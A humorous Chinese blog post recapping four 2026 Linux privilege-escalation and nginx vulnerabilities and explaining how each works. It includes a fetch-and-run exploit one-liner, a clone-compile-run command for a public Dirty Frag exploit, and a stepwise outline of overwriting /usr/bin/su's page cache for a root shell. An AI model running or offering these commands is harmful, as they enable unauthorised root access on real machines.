Linux圈笑传之《什么叫一个月内爆出4个权限提升漏洞?》

YanMo Lv4
  2026-05-22 19:59:44 2026-05-22 19:59:44 创建   2026-05-22 21:17:10 2026-05-22 21:17:10 更新    

来自 网络小白_Uncle城 的整理,GitHub出处:https://github.com/Unclecheng-li/poc-lab

Linux 找回密码教程,建议收藏!

这个漏洞来自 CVE-2026-31431(Copy Fail)内核提升漏洞,仅需732 Bytes拿下 Root 权限。

38小米解锁节都没解锁这么快

怎么用这个漏洞,很简单,一个命令的事

1
curl https://copy.fail/exp python3 && su

阿里云漏洞库:https://avd.aliyun.com/detail?id=AVD-2026-31431
这是2026年4月29日注意这个时间,是个伏笔

你的 Linux 密码又忘了?没关系,这里还有一个新的!

他叫 Dirty Frag,是和Dirty Pipe一家子,甚至Frag这哥们还不配有一个CVE,他只有俩衍生CVE
CVE-2026-43284
CVE-2026-43500
splice() 把只读文件的页缓存页塞进 UDP skb frag;ESP-in-UDP 接收路径误以为这是普通非克隆 skb,跳过 skb_cow_data(),随后 authencesn 在原地解密前置处理中写入 4 字节。认证最后会失败,但页缓存已经被改了。

他的核心不是文件可写,而是内核把不属于 skb 私有所有权的 page cache 页当成了可以原地修改的数据包缓冲区。

1
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

这次时间为 2026-05-11,距离上次差不多三周

听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!

阿里云漏洞库:https://avd.aliyun.com/detail?id=AVD-2026-42945
这个更劲爆,用的是ngx_http_rewrite_module,依旧是堆缓冲区溢出漏洞。行嘛,依旧是直勾勾的进来了
该漏洞在特定配置下触发:rewrite 指令的替换字符串包含问号 ?,并且后续跟随 rewrite、if 或 set 指令,同时使用未命名 PCRE(Perl Compatible Regular Expressions) 捕获组(如 $1、$2)。
远程未认证攻击者可通过构造恶意 HTTP 请求触发该缺陷,导致 NGINX worker 进程发生堆内存破坏并重启,造成拒绝服务;在关闭 ASLR (Address Space Layout Randomization(地址空间布局随机化))的系统上,可能进一步实现远程代码执行。

但是这个不至于太劲爆,如果你开了 ASLR 的话,他是不会直接拿到 Root 权限的,顶多给你搞崩溃

1
cat /proc/sys/kernel/randomize_va_space # 查看是否开启 ASLR

但是劲爆在哪呢,他不需要搞ssh之类的东西,只要拿到Shell权限就行了。加上 Copy 或者 Dirty Drag,提权就好了。

最新劲爆!PinTheft开创全新赛道

在函数 rds_message_zcopy_from_user() 处理用户内存页时存在缺陷。
当零拷贝发送操作部分失败后,错误处理逻辑会重复释放(double-free)已经固定的内存页,导致内核的内存引用计数(reference count)出现异常
结合 io_uring 的高性能异步I/O接口,将一个匿名内存页注册为固定缓冲区(赋予其1024个引用偏置),然后通过精心构造的错误发送请求,逐步”偷走”这些引用计数。
最关键的一步,当引用计数归零后,内核会误以为该内存页已无人使用而将其释放。由于 io_uring 持有的悬空指针依然指向该页,攻击者可以利用这个时机重新申请这个物理页,将其用作目标特权程序(如 /usr/bin/su)的页缓存(Page Cache)
最后,攻击者通过残留的悬空指针,直接向页缓存中写入恶意载荷(一个极小的ELF程序)。当受害者执行 /usr/bin/su 时,内核加载的是已被篡改的内存内容,从而直接返回一个 root shell

但是,Ubuntu(20.04及以后版本)和 Fedora 等发行版,虽然内核包含了RDS模块,但默认通过 modprobe 黑名单配置禁用了其自动加载。只有用户手动加载了该模块的系统才存在风险。
你猜猜是是谁会受到这个影响呢,是Arch Linux!

因为 Arch Linux默认是开着RDS,还是开放这个模块,所以直接拿下Arch Linux的 Root 权限

这个刚好就是本篇前一天的公布的(2026-05-21),差不多一个月,刚好闭环了。

缝缝补补的一个月,Linux圈天塌了

  • 标题: Linux圈笑传之《什么叫一个月内爆出4个权限提升漏洞?》
  • 作者: YanMo
  • 创建于 : 2026-05-22 19:59:44
  • 更新于 : 2026-05-22 21:17:10
  • 链接: https://blog.ymbit.cn/archives/linux-cve-privilege-escalation/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
 评论
此页目录
Linux圈笑传之《什么叫一个月内爆出4个权限提升漏洞?》
  1. Linux 找回密码教程,建议收藏!
  2. 你的 Linux 密码又忘了?没关系,这里还有一个新的!
  3. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
  4. 最新劲爆!PinTheft开创全新赛道